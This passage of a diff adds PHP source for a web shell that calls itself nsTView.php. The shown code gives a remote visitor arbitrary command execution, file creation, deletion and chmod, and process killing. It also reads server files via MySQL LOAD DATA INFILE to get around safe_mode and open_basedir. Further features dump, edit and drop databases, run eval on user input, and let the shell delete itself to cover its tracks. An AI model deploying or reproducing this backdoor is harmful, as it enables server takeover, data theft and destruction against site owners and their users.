+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['shell']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>
+";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>";
+print `$sh`; echo "</pre>";}
+}
+
+if(@$_GET['shell']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>"; print `$sh`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+print "<br><b>PS Table :: Fast kill program<br><br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
